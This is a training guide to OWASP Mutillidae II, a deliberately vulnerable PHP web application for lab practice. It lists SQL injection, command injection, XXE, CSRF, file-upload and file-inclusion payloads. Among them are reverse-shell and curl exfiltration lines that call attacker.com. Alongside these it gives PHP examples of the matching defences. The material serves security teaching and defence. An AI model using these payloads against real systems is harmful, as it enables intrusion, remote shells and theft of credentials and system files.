
OWASP Mutillidae II

OWASP Mutillidae II is a free, open-source vulnerable web application written in PHP that teaches web application security through hands-on challenges covering OWASP Top 10 vulnerabilities, SQL injection, XSS, authentication bypass, and more.

Installation

Docker Installation

# Pull image (note: webgoat/goatandwolf is the WebGoat/WebWolf image, not a
# Mutillidae build; Mutillidae's own Docker setup is published at
# https://github.com/webpwnized/mutillidae-docker and is started with docker compose)
docker pull webgoat/goatandwolf

# Run container
docker run -d -p 8080:80 --name mutillidae webgoat/goatandwolf

# Access at http://localhost:8080/mutillidae/

Manual Installation (Linux/Windows)

# Download latest version
# https://sourceforge.net/projects/mutillidae/

# Extract to web root
# Windows: C:\xampp\htdocs\mutillidae
# Linux: /var/www/html/mutillidae

# Set file permissions
chmod -R 755 /var/www/html/mutillidae

# Create database
# Use phpMyAdmin or command line

# Access application
# http://localhost/mutillidae/

Install on XAMPP/WAMP

# 1. Download XAMPP
# 2. Extract Mutillidae to htdocs folder
# 3. Create database via phpMyAdmin
# 4. Import mutillidae.sql
# 5. Access http://localhost/mutillidae/

Application Navigation

# Home
# Login/Setup (first time setup)
# View Profile
# My Account
# Toggle Hints
# SQLi Injection challenges
# XSS vulnerabilities
# CSRF examples
# Authentication issues
# File upload exercises
# And many more...

Initial Setup

# Click "Setup/Reset DB" to initialize database
# Default credentials:
# Admin: admin / admin

# Create test accounts for a variety of tests

OWASP Top 10 Vulnerability Coverage

A01 - SQL Injection

Exercise            | Type          | Difficulty
--------------------|---------------|-------------
Login Form          | Auth Bypass   | Beginner
User-Agent          | Blind SQLi    | Intermediate
Add User            | Union-based   | Intermediate
Parameter Pollution | Multiple SQLi | Advanced

SQL Injection Examples

# 1. Authentication bypass
' OR '1'='1' --
admin' --
' OR 1=1 --

# 2. UNION-based SQLi
' UNION SELECT NULL,NULL,NULL --
' UNION SELECT table_name,column_name,3 FROM information_schema.columns --

# 3. Blind SQL injection
' AND SLEEP(5) --
' AND (SELECT * FROM (SELECT(SLEEP(5)))a) --

# 4. Time-based detection
' AND IF(1=1,SLEEP(5),0) --

# 5. Stacked queries
'; DROP TABLE users; --
'; UPDATE users SET role='admin'; --

# 6. Data exfiltration
' UNION SELECT GROUP_CONCAT(column_name),2,3 FROM information_schema.columns WHERE table_schema=database() --
' UNION SELECT GROUP_CONCAT(CONCAT(user_id,':',password)),2,3 FROM users --
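The login-form bypass above, shown against a vulnerable concatenated query and its prepared-statement fix. This is an added example, not Mutillidae's own code; the `accounts` table, its rows and the in-memory SQLite database are constructed for the demo.

```php
<?php
// Added example (not Mutillidae's code): the first auth-bypass payload from the
// list above, run against a constructed in-memory SQLite table.
declare(strict_types=1);

function seedDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE accounts (username TEXT, password TEXT)');
    $db->exec("INSERT INTO accounts VALUES ('admin', 'demo-password')"); // constructed row
    return $db;
}

// Vulnerable pattern: input is concatenated into the SQL string, so the
// comment marker in the payload removes the password check entirely.
function loginVulnerable(PDO $db, string $user, string $pass): bool {
    $sql = "SELECT username FROM accounts WHERE username='$user' AND password='$pass'";
    return $db->query($sql)->fetch() !== false;
}

// Hardened pattern: a prepared statement binds the values as data, so the
// same payload is compared literally against the username column.
// (Real code would also store a password_hash() and use password_verify().)
function loginSafe(PDO $db, string $user, string $pass): bool {
    $stmt = $db->prepare('SELECT username FROM accounts WHERE username = ? AND password = ?');
    $stmt->execute([$user, $pass]);
    return $stmt->fetch() !== false;
}

$db = seedDb();
// Trailing space after "--" matters on MySQL, which only treats "-- " followed
// by whitespace as a comment; SQLite accepts "--" either way.
$payload = "' OR '1'='1' -- ";
var_dump(loginVulnerable($db, $payload, 'wrong'));   // bool(true): password check bypassed
var_dump(loginSafe($db, $payload, 'wrong'));         // bool(false): payload is just a username
var_dump(loginSafe($db, 'admin', 'demo-password'));  // bool(true): genuine login still works
```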

A02 - Cryptographic Failures

Weak Cryptography Vulnerabilities

# 1. Plaintext storage
# Check for unencrypted passwords in database
# Look for passwords visible in HTML/JavaScript

# 2. Weak hashing
# MD5: echo -n 'password' | md5sum
# Check whether the hashes can be recovered by wordlist or lookup-table attacks

# 3. Weak encryption keys
# Test if encryption uses hardcoded keys
# Common keys: password, secret, admin, default

# 4. HTTPS not enforced
# Check if sensitive operations use HTTP
# Look for mixed HTTP/HTTPS content

A03 - Injection

Command Injection

# 1. OS command execution
; whoami
| cat /etc/passwd
|| nc attacker.com 4444 -e /bin/sh

# 2. Reverse shell
; bash -i >& /dev/tcp/attacker.com/4444 0>&1

# 3. Command chaining
; ls -la /tmp
& whoami
&& id

# 4. Data exfiltration
; cat /etc/passwd > /tmp/output.txt
| curl http://attacker.com/exfil?data=$(cat /etc/passwd)
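How a host-lookup feature stops the metacharacter payloads listed above: a strict hostname allow-list first, then `escapeshellarg()` so the value can only reach the program as one argument. Added example, not Mutillidae's code; the lookup endpoint and the sample inputs are hypothetical.

```php
<?php
// Added example (not Mutillidae's code): hardening a hypothetical "look up a
// host" feature against the command-injection payloads listed above.
declare(strict_types=1);

function isValidHostname(string $host): bool {
    // Letters, digits, hyphens and dots only; labels of 1-63 chars that do not
    // start or end with a hyphen; at most 253 chars overall. Every character the
    // payloads depend on (; | & $ ( ) > and space) is excluded.
    return strlen($host) <= 253
        && preg_match('/^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$/', $host) === 1;
}

// Returns the command line to run, or null when the input must be refused.
function buildLookupCommand(string $host): ?string {
    if (!isValidHostname($host)) {
        return null;                      // rejected before any shell is involved
    }
    // escapeshellarg() single-quotes the value and escapes embedded quotes,
    // so even an unexpected character would stay inside one argument.
    return 'nslookup ' . escapeshellarg($host);
}

// Constructed inputs: one legitimate hostname, the rest from the payload list above.
$inputs = [
    'example.com',
    'example.com; whoami',
    'example.com | cat /etc/passwd',
    'example.com && id',
    'example.com; cat /etc/passwd > /tmp/output.txt',
];
foreach ($inputs as $in) {
    $cmd = buildLookupCommand($in);
    printf("%-48s => %s\n", $in, $cmd ?? 'REJECTED');
}
// example.com => nslookup 'example.com'; every other input prints REJECTED
```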

A05 - Broken Access Control

IDOR Exploitation

# 1. Enumerate user IDs
# http://localhost/mutillidae/?id=1
# http://localhost/mutillidae/?id=2
# http://localhost/mutillidae/?id=3

# 2. Access unauthorized content
# Modify user_id parameter
# Access profile of user_id=999

# 3. Admin function access
# Try: /admin?id=1
# Try: /user.php?id=admin
# Try: /profile?uid=0

Authorization Bypass

# 1. Direct URL access
# Try admin URLs directly
# /admin/panel
# /admin/users
# /admin/settings

# 2. Parameter manipulation
# role=admin
# is_admin=true
# privilege_level=99

# 3. Method override
# X-Original-URL header
# X-Rewrite-URL header
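A server-side ownership check for the profile lookups shown above (`?id=N`, `user_id=N`): the decision is based on the authenticated session, never on request parameters such as `role=admin`. Added example, not Mutillidae's code; the profile store, session shape and user ids are constructed.

```php
<?php
// Added example (not Mutillidae's code): authorization check for a profile
// endpoint, defeating the IDOR and parameter-manipulation attempts listed above.
declare(strict_types=1);

// Constructed user store: id => profile
const PROFILES = [
    1   => ['name' => 'alice', 'role' => 'user'],
    2   => ['name' => 'bob',   'role' => 'user'],
    999 => ['name' => 'admin', 'role' => 'admin'],
];

// Identity and role come from the server-side session, never from the request.
function canViewProfile(array $session, int $requestedId): bool {
    if (!isset($session['user_id'], $session['role'])) {
        return false;                                     // not authenticated
    }
    if ($session['role'] === 'admin') {
        return array_key_exists($requestedId, PROFILES);  // admins: any existing profile
    }
    return $session['user_id'] === $requestedId;          // users: their own record only
}

function viewProfile(array $session, array $query): string {
    // Type-check the parameter first: "admin", "0" and "-1" all fail here.
    $id = filter_var($query['id'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return '400 Bad Request';
    }
    // Non-admins get the same 403 whether or not the id exists, so the
    // endpoint cannot be used to enumerate valid ids.
    if (!canViewProfile($session, $id)) {
        return '403 Forbidden';
    }
    return '200 ' . PROFILES[$id]['name'];
}

$alice = ['user_id' => 1, 'role' => 'user'];                      // constructed session
echo viewProfile($alice, ['id' => '1']), "\n";                    // 200 alice
echo viewProfile($alice, ['id' => '2']), "\n";                    // 403 Forbidden
echo viewProfile($alice, ['id' => '999']), "\n";                  // 403 Forbidden
echo viewProfile($alice, ['id' => 'admin']), "\n";                // 400 Bad Request
echo viewProfile($alice, ['id' => '2', 'role' => 'admin']), "\n"; // 403 Forbidden: role in query is ignored
```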

A07 - Identification and Authentication Failures

Weak Authentication

# 1. Default credentials
# admin / admin
# admin / password
# test / test

# 2. Brute force attack
# hydra -l admin -P wordlist.txt localhost http-post-form

# 3. Predictable session IDs
# Check session cookie values
# Look for patterns (sequential IDs)

# 4. Session fixation
# Set session ID manually
# Admin accepts it without verification

# 5. Weak password reset
# Predictable reset tokens
# User email as reset mechanism
# Bypass verification questions

A06 - Vulnerable and Outdated Components

Testing for Vulnerable Libraries

# 1. Check installed packages
# grep -r "version" wp-content/plugins/
# cat package.json | grep version

# 2. Identify outdated components
# npm audit
# composer audit

# 3. Test known vulnerabilities
# searchsploit application-name
# Use CVE databases for version info

Advanced Exercise Categories

XXE (XML External Entity) Injection

# 1. Basic XXE
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

# 2. XXE with exfiltration
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?p=%xxe;'>">
%all;
]>
<foo>&exfiltrate;</foo>

# 3. Blind XXE
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/xxe.dtd">
%dtd;
]>
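Parsing untrusted XML so that the DOCTYPE-based payloads above cannot read local files or reach the network. Added example, not Mutillidae's code; it assumes the application has no legitimate need for a DTD, so any DOCTYPE is refused outright, and the sample documents are constructed.

```php
<?php
// Added example (not Mutillidae's code): XXE-resistant XML parsing with DOMDocument.
// Policy: refuse any DTD, then parse with LIBXML_NONET and without LIBXML_NOENT
// so entities are never substituted. (PHP 8.0+ also disables external entity
// loading by default; the checks below do not rely on that.)
declare(strict_types=1);

function parseUntrustedXml(string $xml): ?DOMDocument {
    // Cheapest and most robust control: internal and external subsets alike
    // (all three payloads above) start with a DOCTYPE declaration.
    if (preg_match('/<!DOCTYPE/i', $xml) === 1) {
        return null;
    }
    $dom = new DOMDocument();
    // Never pass LIBXML_NOENT (entity substitution) or LIBXML_DTDLOAD here.
    // LIBXML_NONET blocks network access during parsing as a second layer.
    $ok = $dom->loadXML($xml, LIBXML_NONET | LIBXML_NOERROR | LIBXML_NOWARNING);
    if ($ok === false || $dom->doctype !== null) {
        return null;
    }
    return $dom;
}

// Constructed inputs: the basic XXE payload from above, and a benign document.
$xxe = '<?xml version="1.0"?>'
     . '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
     . '<foo>&xxe;</foo>';
$benign = '<?xml version="1.0"?><foo>hello</foo>';

var_dump(parseUntrustedXml($xxe) === null);                   // bool(true): rejected
$doc = parseUntrustedXml($benign);
var_dump($doc !== null ? $doc->documentElement->textContent : null); // string(5) "hello"
```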

Cross-Site Request Forgery (CSRF)

# 1. Simple CSRF form
<form action="http://localhost/mutillidae/transfer.php" method="POST">
  <input type="hidden" name="amount" value="1000">
  <input type="hidden" name="to" value="attacker">
  <input type="submit">
</form>

# 2. Auto-submitting CSRF
<body onload="document.forms[0].submit()">

# 3. Image-based CSRF
<img src="http://localhost/mutillidae/transfer.php?amount=1000&to=attacker">
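A per-session anti-CSRF token for the transfer form attacked above, plus a POST-only handler that defeats the image-based GET variant. Added example, not Mutillidae's code; the session is modelled as an array so the script runs from the CLI (in the application it would be `$_SESSION`), and `transfer.php` is only the form target named above.

```php
<?php
// Added example (not Mutillidae's code): anti-CSRF token for the transfer form.
declare(strict_types=1);

function issueCsrfToken(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));   // 256 random bits per session
    }
    return $session['csrf_token'];
}

// The legitimate page embeds the token; a cross-site form cannot read it.
function renderTransferForm(array &$session): string {
    $token = htmlspecialchars(issueCsrfToken($session), ENT_QUOTES, 'UTF-8');
    return '<form action="transfer.php" method="POST">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<input name="amount"><input name="to"><input type="submit"></form>';
}

// Server-side handler: only a POST carrying this session's token may transfer.
function handleTransfer(array $session, string $method, array $post): string {
    if ($method !== 'POST') {
        return '405 Method Not Allowed';    // kills the <img src="...transfer.php?..."> variant
    }
    $expected = $session['csrf_token'] ?? '';
    $given    = is_string($post['csrf_token'] ?? null) ? $post['csrf_token'] : '';
    // hash_equals() compares in constant time; a plain === leaks timing.
    if ($expected === '' || !hash_equals($expected, $given)) {
        return '403 Forbidden: missing or invalid CSRF token';
    }
    return sprintf('200 OK: transferred %s to %s', $post['amount'] ?? '?', $post['to'] ?? '?');
}

$session = [];                                   // constructed: fresh logged-in session
echo renderTransferForm($session), "\n";         // page served to the victim, token inside

// Cross-site attacker form from above: the browser attaches cookies but has no token
echo handleTransfer($session, 'POST', ['amount' => '1000', 'to' => 'attacker']), "\n";
// Image-based variant arrives as GET
echo handleTransfer($session, 'GET', ['amount' => '1000', 'to' => 'attacker']), "\n";
// Legitimate submission from the rendered form
echo handleTransfer($session, 'POST',
    ['amount' => '50', 'to' => 'bob', 'csrf_token' => $session['csrf_token']]), "\n";
// Setting the session cookie with SameSite=Lax or Strict adds a second, independent layer.
```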

File Upload Vulnerabilities

# 1. Unrestricted file upload
# Upload .php shell

# 2. Bypass MIME type check
# Upload .php as .jpg
# Modify Content-Type header

# 3. Bypass extension filter
# shell.php5
# shell.phtml
# shell.php.jpg

# 4. Double extension
# shell.php.jpg (executed as PHP only when the server maps handlers by any extension in the name, e.g. a misconfigured Apache AddHandler)

# 5. Null byte injection (PHP older than 5.3.4)
# shell.php%00.jpg
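Upload validation that covers the bypass list above: decide on the last extension plus the file's real content, ignore the client's Content-Type, choose the stored name server-side and keep files in a directory the web server never executes. Added example, not Mutillidae's code; the upload path and the sample file bytes are constructed.

```php
<?php
// Added example (not Mutillidae's code): image upload validation resistant to
// the extension, MIME, double-extension and null-byte bypasses listed above.
declare(strict_types=1);

const ALLOWED = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];

// Returns [accepted, detail]; detail is the stored path or the rejection reason.
function validateUpload(string $clientName, string $bytes): array {
    // 1. An embedded NUL ("shell.php%00.jpg" after decoding) is never legitimate.
    if (strpos($clientName, "\0") !== false) {
        return [false, 'null byte in filename'];
    }
    // 2. Only the LAST extension counts, lower-cased: shell.php.jpg -> jpg;
    //    shell.phtml and shell.php5 are simply not in the allow-list.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        return [false, "extension '$ext' not allowed"];
    }
    // 3. Sniff the real content; the client-supplied Content-Type header is ignored.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
    if ($mime !== ALLOWED[$ext]) {
        return [false, "content is $mime, not " . ALLOWED[$ext]];
    }
    // 4. Server-chosen random name with a fixed extension, outside the document
    //    root, so nothing the uploader controls ends up in an executable path.
    $stored = '/var/app/uploads/' . bin2hex(random_bytes(16)) . '.' . $ext;  // constructed path
    return [true, $stored];
}

// Constructed samples: a minimal JPEG/JFIF header and a harmless PHP file body.
$jpegBytes = "\xFF\xD8\xFF\xE0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00";
$phpBytes  = "<?php echo 'not an image'; ?>";

foreach ([
    ['photo.jpg',       $jpegBytes],   // ACCEPT
    ['shell.php',       $phpBytes],    // REJECT: extension
    ['shell.phtml',     $phpBytes],    // REJECT: extension
    ['shell.php.jpg',   $phpBytes],    // REJECT: extension passes, content sniff fails
    ["shell.php\0.jpg", $phpBytes],    // REJECT: null byte
] as [$name, $bytes]) {
    [$ok, $detail] = validateUpload($name, $bytes);
    printf("%-16s %s %s\n", addcslashes($name, "\0"), $ok ? 'ACCEPT' : 'REJECT', $detail);
}
```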

Remote File Inclusion (RFI)

# 1. Basic RFI
# http://localhost/mutillidae/index.php?page=http://attacker.com/shell.php

# 2. Log file poisoning
# http://localhost/mutillidae/?page=../../var/log/apache2/access.log

# 3. With LFI wrapper
# http://localhost/mutillidae/?page=php://filter/convert.base64-encode/resource=../../index.php

Manual Testing Process

Reconnaissance

# 1. Map application
# Click all menus and links
# Note page parameters

# 2. Identify input fields
# Login forms
# Search boxes
# Upload fields
# Comments/feedback areas

# 3. Check source code
# View page source (Ctrl+U)
# Look for hardcoded values
# Check JavaScript for tokens

# 4. Examine HTTP traffic
# Use Burp Suite or DevTools
# Note all parameters
# Check headers for info disclosure

Vulnerability Testing

# 1. Test each input field
# XSS: <script>alert(1)</script>
# SQLi: ' OR '1'='1' --
# Command Injection: ; whoami

# 2. Test authentication
# SQL injection in login
# Default credentials
# Session manipulation

# 3. Test authorization
# Access admin functions
# Modify user roles
# Access other users' data

# 4. Test file handling
# Upload restricted types
# Traverse directories
# Access system files

Using Burp Suite

Intercepting Requests

# 1. Set the browser proxy to localhost:8080 (Burp's default listener; if Mutillidae itself is published on 8080 as in the Docker example above, move one of them to another port)
# 2. Start Burp Suite
# 3. Navigate Mutillidae
# 4. Capture requests in Proxy tab

# 5. Send to Repeater for testing
# 6. Modify parameters and resend

# 7. Use Intruder for:
# Brute force
# Parameter fuzzing
# Payload delivery

Scanner Features

# 1. Active scan
# Let Burp test for vulnerabilities
# Generate scan report

# 2. Passive scan
# Identify issues in traffic
# Check for configuration flaws

# 3. Issue details
# Each finding shows:
# - Description
# - Proof of concept
# - Remediation advice

Database Interaction

MySQL Commands

# 1. Connect to database
mysql -u root -p

# 2. View tables
USE mutillidae;
SHOW TABLES;

# 3. View user data
SELECT * FROM user;
SELECT username,password FROM user;

# 4. Modify data
UPDATE user SET role='admin' WHERE username='attacker';

# 5. Delete records
DELETE FROM user WHERE id=999;

# 6. View current queries
SELECT * FROM information_schema.processlist;

Exploitation Workflow

Step 1: Enumeration

# 1. List all users
# SQL: ' UNION SELECT username,password,3 FROM user --

# 2. Find available functions
# SQL: ' UNION SELECT GROUP_CONCAT(routine_name),2,3 FROM information_schema.routines --

# 3. Check file permissions
# Check if files are writable
# Look for upload directories

Step 2: Exploitation

# 1. Execute payloads
# XSS to steal session
# SQLi to extract data
# Command injection for RCE

# 2. Establish persistence
# Create backdoor user
# Upload webshell
# Inject reverse shell

Step 3: Privilege Escalation

# 1. Use escalation vulnerabilities
# IDOR to access admin
# Bypass authentication
# Modify user roles in database

# 2. Gain system access
# RCE via command injection
# Read system files
# Create new admin account

Best Practices for Learning

  • Complete challenges in difficulty order
  • Read hints if completely stuck
  • Understand vulnerability root cause
  • Review remediation code
  • Practice multiple exploitation methods
  • Document findings
  • Teach others what you learn
  • Test in isolated environment
  • Never use skills maliciously

Challenge Tips and Tricks

Tip 1: Many fields are vulnerable to multiple attack types
Tip 2: Check hints if you're stuck, they're valuable
Tip 3: Database structure is visible through information_schema
Tip 4: Upload functionality often has bypass techniques
Tip 5: Session cookies can be modified with browser DevTools

Resources


Last updated: 2026-03-30